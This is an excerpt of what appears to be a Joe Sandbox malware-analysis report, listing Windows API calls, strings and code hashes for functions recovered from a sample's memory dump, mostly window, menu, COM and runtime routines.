                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: de5638b05e860cdf6e008de6bbcd0c3467c9a5947d269f56e17d9198ed820169
                                                  • Instruction ID: d478aa6b0b016469473d0310f26a319ac224d1d99c447509dacde5712cdd435d
                                                  • Opcode Fuzzy Hash: de5638b05e860cdf6e008de6bbcd0c3467c9a5947d269f56e17d9198ed820169
                                                  • Instruction Fuzzy Hash: 3D11F335500104ABCB18AB30AC86FDE77BCEF07356F0401BAF84992091EF708AC6EA55
                                                  Function 00C54F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00C54F7A
                                                    • Part of subcall function 00C1049F: timeGetTime.WINMM(?,75A4B400,00C00E7B), ref: 00C104A3
                                                  • Sleep.KERNEL32(0000000A), ref: 00C54FA6
                                                  • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C54FCA
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C54FEC
                                                  • SetActiveWindow.USER32 ref: 00C5500B
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C55019
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C55038
                                                  • Sleep.KERNEL32(000000FA), ref: 00C55043
                                                  • IsWindow.USER32 ref: 00C5504F
                                                  • EndDialog.USER32(00000000), ref: 00C55060
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 298f0b4a4a53702f1837f989bc269aa9acd058fff81ecece3a041fa3ae9eb88c
                                                  • Instruction ID: fd2716fa438fc417cde19e846e1f4c63223584e9fdea50da9dd37f4ef8fc6be4
                                                  • Opcode Fuzzy Hash: 298f0b4a4a53702f1837f989bc269aa9acd058fff81ecece3a041fa3ae9eb88c
                                                  • Instruction Fuzzy Hash: D921D179644605AFE7205F70ECC8B2E3B69FB4874AF041128F809811F0CB719ED99776
                                                  Function 00C5D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • CoInitialize.OLE32(00000000), ref: 00C5D5EA
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C5D67D
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00C5D691
                                                  • CoCreateInstance.OLE32(00C82D7C,00000000,00000001,00CA8C1C,?), ref: 00C5D6DD
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C5D74C
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00C5D7A4
                                                  • _memset.LIBCMT ref: 00C5D7E1
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00C5D81D
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C5D840
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00C5D847
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C5D87E
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00C5D880
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: f80efdbf0920d62c8e6bf84a0a766bc19fedc428896691b31879b11bee0d70c5
                                                  • Instruction ID: 05ef8b08ad1a241fef37e1c48f24ee19821ea50d95965f282355e396f0bbe51f
                                                  • Opcode Fuzzy Hash: f80efdbf0920d62c8e6bf84a0a766bc19fedc428896691b31879b11bee0d70c5
                                                  • Instruction Fuzzy Hash: 94B10F75A00209AFDB14DF64C888EAEBBF9FF49305B1444A9F90ADB251DB30ED85CB54
                                                  Function 00C4C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00C4C283
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C4C295
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C4C2F3
                                                  • GetDlgItem.USER32(?,00000002), ref: 00C4C2FE
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C4C310
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C4C364
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C4C372
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C4C383
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C4C3C6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C4C3D4
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C4C3F1
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C4C3FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 9c6708e14c5428c950820a2c1eb1d049323c08a356d62e133d59aa17557c7445
                                                  • Instruction ID: 051424455d5fa56b34000b6db075594dfdea971e66ebe6088bf71e8000679e4f
                                                  • Opcode Fuzzy Hash: 9c6708e14c5428c950820a2c1eb1d049323c08a356d62e133d59aa17557c7445
                                                  • Instruction Fuzzy Hash: 4E510F71B00205ABDB18CFA9DD99BAEBBB6FB88711F14812DF519D72A0D7709E418B10
                                                  Function 00BF201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2036,?,00000000,?,?,?,?,00BF16CB,00000000,?), ref: 00BF1B9A
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BF20D3
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00BF216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00C2BCA6
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00C2BCD7
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00C2BCEE
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00C2BD0A
                                                  • DeleteObject.GDI32(00000000), ref: 00C2BD1C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 6fc29577b193f632c89e6e73441e66ab3cbaf38333f2531a62c32bad3156a952
                                                  • Instruction ID: 46c1ff85a73fee1bedde73150f830baaffd434e9429cadc58022b991cb0bc309
                                                  • Opcode Fuzzy Hash: 6fc29577b193f632c89e6e73441e66ab3cbaf38333f2531a62c32bad3156a952
                                                  • Instruction Fuzzy Hash: D1619931100A18DFDB25AF24D989B3AB7F2FF44312F10856DE2469BAA0CB71AD85DF40
                                                  Function 00BF21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BF25EC
                                                  • GetSysColor.USER32(0000000F), ref: 00BF21D3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 5a5a67003089fba937e2b32d15791f433c86d76a1a67ae2c23221e6e120dfc17
                                                  • Instruction ID: e7e0681e24b27f4605220d274831ce338ef5b6d173ad1ccf39060c5c7fa66223
                                                  • Opcode Fuzzy Hash: 5a5a67003089fba937e2b32d15791f433c86d76a1a67ae2c23221e6e120dfc17
                                                  • Instruction Fuzzy Hash: 5841B231100154DFDB215F28EC88BBD3BA5EB06331F6442A9FE658B1E6C7318D86DB21
                                                  Function 00C5A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,00C7F910), ref: 00C5A90B
                                                  • GetDriveTypeW.KERNEL32(00000061,00CA89A0,00000061), ref: 00C5A9D5
                                                  • _wcscpy.LIBCMT ref: 00C5A9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: 1ed65c2609cb1e7952fb6176a3e1af1d3621063b853d9617dd703478ee2cd04b
                                                  • Instruction ID: 2064fdbc664a161ad639cd5423109ba715aaa6dc6ebbaf471c26d5e4ff4fa381
                                                  • Opcode Fuzzy Hash: 1ed65c2609cb1e7952fb6176a3e1af1d3621063b853d9617dd703478ee2cd04b
                                                  • Instruction Fuzzy Hash: 2651EB35108301AFC700EF25C892AAFB7E5EF81705F10496DF9A6572A2DB309A8DDA53
                                                  Function 00BF9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: 8530dca27ebd6173c9eb6b94a4971f26c7d998d917d128724faa282e9692cf92
                                                  • Instruction ID: 69f57437f4ab8f35c9d79bd56fc8bfe235dd2897921ed47a51e4cab85ac9e7ed
                                                  • Opcode Fuzzy Hash: 8530dca27ebd6173c9eb6b94a4971f26c7d998d917d128724faa282e9692cf92
                                                  • Instruction Fuzzy Hash: 9441D77150020D9FDB24DF74E841E7677F8FF06344F2044BEE549D7291EA719A469710
                                                  Function 00C77152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7716A
                                                  • CreateMenu.USER32 ref: 00C77185
                                                  • SetMenu.USER32(?,00000000), ref: 00C77194
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C77221
                                                  • IsMenu.USER32(?), ref: 00C77237
                                                  • CreatePopupMenu.USER32 ref: 00C77241
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C7726E
                                                  • DrawMenuBar.USER32 ref: 00C77276
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: 822b8fec298fc6d456c1ad35b19104caea8e72ceb3b1f25a7d337884614df3c5
                                                  • Instruction ID: 309960a47bcca23b8f431cfe3d94f338c6954bb7afc157eacd7f0695e5abb40b
                                                  • Opcode Fuzzy Hash: 822b8fec298fc6d456c1ad35b19104caea8e72ceb3b1f25a7d337884614df3c5
                                                  • Instruction Fuzzy Hash: AD415875A01209EFDB20DFA5D884F9A7BB5FF49310F144128F929A7361D731AA10CFA0
                                                  Function 00C774BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C7755E
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00C77565
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C77578
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C77580
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C7758B
                                                  • DeleteDC.GDI32(00000000), ref: 00C77594
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00C7759E
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C775B2
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C775BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: 4f70e2e9779f849b44979e3a5b849d469f02e85aca8936374aced9b16c79ef33
                                                  • Instruction ID: e97f1dc006d5553e43cd4f2a62f6ec605154acd31f3dafe231b2018aa6a4831f
                                                  • Opcode Fuzzy Hash: 4f70e2e9779f849b44979e3a5b849d469f02e85aca8936374aced9b16c79ef33
                                                  • Instruction Fuzzy Hash: C1316D72104219BBDF119F64DC48FDE3B69FF09360F114329FA29A61A0C731D962DBA4
                                                  Function 00C16E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C16E3E
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  • __gmtime64_s.LIBCMT ref: 00C16ED7
                                                  • __gmtime64_s.LIBCMT ref: 00C16F0D
                                                  • __gmtime64_s.LIBCMT ref: 00C16F2A
                                                  • __allrem.LIBCMT ref: 00C16F80
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C16F9C
                                                  • __allrem.LIBCMT ref: 00C16FB3
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C16FD1
                                                  • __allrem.LIBCMT ref: 00C16FE8
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C17006
                                                  • __invoke_watson.LIBCMT ref: 00C17077
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction ID: d30e981a80bc1a00287c6011e29d3de151bfd206603f42b18f519c60f7f678c1
                                                  • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction Fuzzy Hash: 3C710876A00716ABD714EF69DC41BDAB3B4AF06324F148239F424D7681E770DE81AB90
                                                  Function 00C52527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52542
                                                  • GetMenuItemInfoW.USER32(00CB5890,000000FF,00000000,00000030), ref: 00C525A3
                                                  • SetMenuItemInfoW.USER32(00CB5890,00000004,00000000,00000030), ref: 00C525D9
                                                  • Sleep.KERNEL32(000001F4), ref: 00C525EB
                                                  • GetMenuItemCount.USER32(?), ref: 00C5262F
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C5264B
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00C52675
                                                  • GetMenuItemID.USER32(?,?), ref: 00C526BA
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C52700
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C52714
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C52735
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 22f86e8a3385f6d8ca60ce381b008e7f932347828f000668ba7e69ffb66d5910
                                                  • Instruction ID: bfb0a55e889cd59fac793816afdfe7232805381da974a3ef72aac4f442d5a2c8
                                                  • Opcode Fuzzy Hash: 22f86e8a3385f6d8ca60ce381b008e7f932347828f000668ba7e69ffb66d5910
                                                  • Instruction Fuzzy Hash: 7E619D78900249AFDB11CF64CC88EBE7BF8EB06346F540159FC51A3251DB31AE8ADB25
                                                  Function 00C76F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C76FA5
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C76FA8
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C76FCC
                                                  • _memset.LIBCMT ref: 00C76FDD
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C76FEF
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C77067
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: e82ec7661387b218c68586397547f757dcc89b4cf40a8377573b919ea5d67a9b
                                                  • Instruction ID: 6b4f2c3c70f0abc27b0d0dad7be3d3a4698c946d1a66f201ad0be24a1fd27c8b
                                                  • Opcode Fuzzy Hash: e82ec7661387b218c68586397547f757dcc89b4cf40a8377573b919ea5d67a9b
                                                  • Instruction Fuzzy Hash: A8613C75A00208AFDB11DFA4CC81FEE77F8EB09710F144199FA19AB2A1D771AE45DB90
                                                  Function 00C46B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C46BBF
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00C46C18
                                                  • VariantInit.OLEAUT32(?), ref: 00C46C2A
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C46C4A
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00C46C9D
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C46CB1
                                                  • VariantClear.OLEAUT32(?), ref: 00C46CC6
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00C46CD3
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C46CDC
                                                  • VariantClear.OLEAUT32(?), ref: 00C46CEE
